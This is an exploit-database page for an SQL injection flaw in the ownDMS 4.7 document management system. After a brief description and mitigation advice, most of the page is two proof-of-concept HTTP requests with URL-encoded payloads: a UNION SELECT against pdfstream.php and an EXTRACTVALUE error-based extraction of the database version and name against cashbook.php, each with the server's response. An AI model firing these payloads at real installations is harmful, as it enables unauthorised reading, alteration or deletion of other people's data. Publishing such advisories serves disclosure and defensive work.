header-logo
Suggest Exploit
vendor:
owndms
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: owndms
Affected Version From: 4.7
Affected Version To: 4.7
Patch Exists: NO
Related CWE: N/A
CPE: a:owndms:owndms:4.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2019

ownDMS 4.7 – SQL Injection

ownDMS 4.7 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the IMG, showfordoc parameters in pdfstream.php, imagestream.php, anyfilestream.php, cashbook.php respectively. This can be exploited to bypass authentication, access, modify and delete data in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input data and use parameterized queries.
Source

Exploit-DB raw data:

# Exploit Title: ownDMS 4.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.owndms.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/owndms/owndms_47.zip
# Version: 4.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/includes/pdfstream.php?IMG=[SQL]
# http://localhost/[PATH]/includes/imagestream.php?IMG=[SQL]
# http://localhost/[PATH]/includes/anyfilestream.php?IMG=[SQL]
# 

GET /[PATH]/includes/pdfstream.php?IMG=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35,0x48656c6c6f204861636b657220416269,%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2019 11:22:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment; filename="Hello Hacker Abi"
Content-Length: 859
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/cashbook.php?showfordoc=[SQL]
# 

GET /[PATH]/cashbook.php?showfordoc=%27%20AND%20%45%58%54%52%41%43%54%56%41%4c%55%45(%32%32,%43%4f%4e%43%41%54(0x5c,%76%65%72%73%69%6f%6e(),(%53%45%4c%45%43%54%20(%45%4c%54(%31%3d%31%2c%31))),%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2019 08:15:55 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Content-Length: 5150
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Navigation

Suggest Exploit

Services By CQR